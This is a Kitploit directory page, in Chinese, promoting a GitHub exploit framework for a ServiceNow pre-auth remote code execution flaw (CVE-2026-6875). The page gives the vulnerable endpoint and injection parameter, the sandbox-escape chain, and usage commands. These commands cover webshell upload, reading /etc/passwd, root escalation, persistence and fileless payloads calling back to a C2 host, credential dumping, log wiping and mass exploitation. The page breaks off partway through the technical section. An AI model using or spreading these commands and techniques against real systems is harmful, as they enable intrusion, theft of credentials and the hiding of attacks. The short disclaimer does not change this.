Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 ServiceNow 预认证 RCE 框架 🔥 JS 注入 → 沙箱逃逸 → RCE → Root。功能:--detect、--exec、反弹/交互式 shell、批量线程、WAF 绕过、持久化、横向移动、凭据转储、无文件执行、清除痕迹。🛡️ CVSS 9.5 已被积极利用。仅限授权与合法使用。保持合法。🔒 | Kitploit
工具/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
权限提升漏洞扫描器持久化机制漏洞利用横向移动Web应用程序漏洞利用后渗透利用WAF绕过渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
远程访问工具
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

CVE-2026-6875 ServiceNow 预认证 RCE 框架 🔥 JS 注入 → 沙箱逃逸 → RCE → Root。功能:--detect、--exec、反弹/交互式 shell、批量线程、WAF 绕过、持久化、横向移动、凭据转储、无文件执行、清除痕迹。🛡️ CVSS 9.5 已被积极利用。仅限授权与合法使用。保持合法。🔒

查看仓库
3252个月前尚未审核

CVE-2026-6875

CVE-2026-6875 - ServiceNow 预认证 RCE 漏洞利用框架与 PoC 验证器 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

ServiceNow AI 平台 — JavaScript 注入 → 沙箱逃逸 → RCE → Root 提权

漏洞利用框架与安全验证器
仅供授权安全测试使用。


⚖️ 法律免责声明与负责任使用

本工具仅供教育和授权渗透测试目的使用。

作者和贡献者不对因使用本软件而造成的任何滥用或损害负责。用户须自行确保在测试前已获得目标所有者的明确书面许可。根据《计算机欺诈与滥用法》(CFAA)及全球类似法律,未经授权访问计算机系统属于违法行为。

使用本软件即表示您同意:

  • 仅将其用于您拥有或已获得明确测试许可的系统。
  • 遵守所有适用的地方、州和联邦法律。
  • 不将其用于任何恶意、破坏性或非法活动。

⚠️ 警告: 该漏洞正在被野外积极利用。未经授权的使用可能导致严重的法律后果。


🔥 漏洞概述

CVE-2026-6875 是 ServiceNow AI 平台(原 Now Platform)中的一个严重 未认证远程代码执行(RCE) 漏洞。攻击者可借此绕过脚本沙箱,并以 ServiceNow 应用程序的权限执行任意系统命令。

工作原理:

  1. JavaScript 注入: assessment_thanks.do 端点接受 sysparm_assessable_type 参数。攻击者通过在值前添加 javascript: 前缀来注入任意 JavaScript 代码。

  2. 沙箱逃逸: 一个复杂的沙箱逃逸小工具(链式利用 DiscoveryFunctions.getCacheObjectForTable、AbstractAjaxProcessor 和 Class.create)解除 JavaScript 沙箱限制。

  3. 远程代码执行: 注入的 Java 代码(通过 java.lang.Runtime.exec())以 ServiceNow 应用程序权限运行,从而实现完整的系统入侵。

  4. 权限提升: 利用后模块尝试通过 sudo 错误配置、SUID 二进制文件、可写的 cron 任务或内核漏洞利用提升至 root 权限。

关键事实:

属性值
📅 发现时间2026 年 4 月 1 日(Searchlight Cyber)
⚠️ CVSS 评分9.5(严重)
📋 CISA KEV2026 年 7 月 13 日添加
🎯 受影响产品自托管 ServiceNow AI 平台
🔄 修复版本Brazil EA/GA、Australia Patch 2、Zurich Patch 7b/9、Yokohama Patch 12 Hot Fix 1b/13
🔓 认证要求无需认证(预认证)
🌍 活跃利用已在野外确认(2026 年 7 月)

🛠️ 漏洞利用框架(exploit.py)

完整武器化漏洞利用 将 JavaScript 注入与沙箱逃逸链式结合以实现远程代码执行,并配备用于持久化、横向移动和凭据转储的高级利用后模块。

✨ 功能特性

功能描述
🚀 JavaScript 注入通过 sysparm_assessable_type 参数注入载荷。
💻 沙箱逃逸绕过 ServiceNow 脚本沙箱以运行任意 Java 代码。
🔐 交互式 Shell生成实时 shell,支持多条命令。
👑 Root 提权检查 sudo 错误配置、SUID 二进制文件和 cron 任务。
📁 文件操作上传 WebShell,通过 base64 编码读取/下载文件。
🌐 批量扫描使用多线程批量利用多个目标(-l 参数)。
🎯 安全检测可选的 --detect 参数,用于非侵入式漏洞验证。
⚙️ WAF 绕过内置混淆技术以绕过 WAF/IDS(6 种技术)。
🧩 持久化安装 cron/systemd/schtasks 后门。
🔍 横向移动扫描本地网络中的其他易受攻击主机,并尝试通过 SSH/SSRF 传播。
🧹 痕迹清理删除日志、bash 历史记录和审计痕迹。
💾 无文件执行使用 Java ClassLoader 在内存中运行载荷,无需写入磁盘。
🔌 回调服务器内置 HTTP 服务器,用于接收命令输出(可选)。
📢 Webhook 通知将结果发送到自定义 URL(Slack、Discord 等)。
🪟 跨平台支持 Linux 和 Windows 目标(cmd.exe / PowerShell)。
🔒 线程安全使用锁机制实现并发操作安全。
📊 版本检测检测 ServiceNow 版本(Zurich/Brazil/Australia/Yokohama)。

交互式 Shell 命令

命令描述
exec <cmd>执行系统命令
upload <local> [remote]将 WebShell 上传到目标
download <remote>下载并显示文件内容
privesc尝试权限提升
reverse <host> <port>发送反向 Shell
dumpcred从 ServiceNow 配置中转储凭据
persist <host> <port>安装持久化(cron/systemd/schtasks)
lateral尝试横向移动
clean清理痕迹(日志、历史记录)
memory <host> <port>执行无文件 Java 载荷
exit退出交互式 Shell

🕵️ 安全验证器(verifier.py)

安全验证器 执行非侵入式漏洞检测,既不执行有害载荷,也不更改系统。

✨ 功能特性

功能描述
🔍 ServiceNow 检测通过多个端点识别 ServiceNow 实例。
📊 版本检测检测具体的 ServiceNow 版本和补丁级别。
🧪 JavaScript 注入测试使用安全的 gs.print() 载荷测试注入漏洞。
🔒 沙箱逃逸测试在不执行破坏性命令的情况下验证沙箱逃逸。
📈 置信度评分基于证据提供置信度百分比(85‑95%)。
📋 JSON 输出将结果导出为 JSON 格式以便报告。
🔄 批量扫描支持多线程扫描多个目标。
🎯 非侵入式仅执行无害的 uname -a 获取系统信息。

📦 安装与要求

前提条件

  • Python 3.6+
  • pip(用于 requests 库)

安装依赖

pip install requests urllib3

[!NOTE] exploit.py 的核心功能仅使用标准库;requests 仅用于 --detect 功能、--webhook 通知和安全验证器。


🚀 使用示例

[1] 安全验证器(verifier.py)

# Single target verification
python verifier.py -u 192.168.1.100

# Custom port and path
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# Mass scan from file
python verifier.py -l targets.txt -o results.json

# Quiet mode (only vulnerable targets)
python verifier.py -u 192.168.1.100 -q

# Increase timeout for slow targets
python verifier.py -u servicenow.example.com --timeout 60

# Custom User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] 漏洞利用框架(exploit.py)

# Interactive shell on target
python exploit.py -u 192.168.1.100

# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# Enable detection before exploitation
python exploit.py -u 192.168.1.100 --detect

# Attempt root privilege escalation
python exploit.py -u 192.168.1.100 --privesc

# Upload a webshell
python exploit.py -u 192.168.1.100 --upload shell.jsp

# Install persistence with C2
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# Clean tracks after exploit
python exploit.py -u 192.168.1.100 --clean

# Use fileless (memory) payload
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# Custom callback server port
python exploit.py -u 192.168.1.100 --callback-port 9090

# Enable WAF bypass techniques
python exploit.py -u 192.168.1.100 --waf-bypass

# Send notifications via webhook
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# Disable TLS verification (for self-signed certs)
python exploit.py -u 192.168.1.100 --insecure-tls

# Custom timeout and retries
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 受影响版本

ServiceNow 版本受影响版本修复版本
BrazilEA、GA已修补(GA 之后)
AustraliaPatch 2 之前Patch 2+
ZurichPatch 7b、Patch 9 之前Patch 7b、Patch 9+
YokohamaPatch 12 Hot Fix 1b 之前Patch 12 Hot Fix 1b、Patch 13
其他版本未知请查看官方公告

⚠️ 重要提示: ServiceNow Cloud 实例会自动修补。此漏洞主要影响 自托管 部署。


🧠 技术深度剖析

1. JavaScript 注入(CVE-2026-6875)

该漏洞位于 assessment_thanks.do 端点中,该端点接受 sysparm_assessable_type 参数。通过提供以 javascript: 开头的值,平台会在系统上下文中执行后续的 JavaScript。

易受攻击的端点:

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. 沙箱逃逸小工具

注入的代码最初被限制在沙箱中。然而,通过利用以下链:

下载工具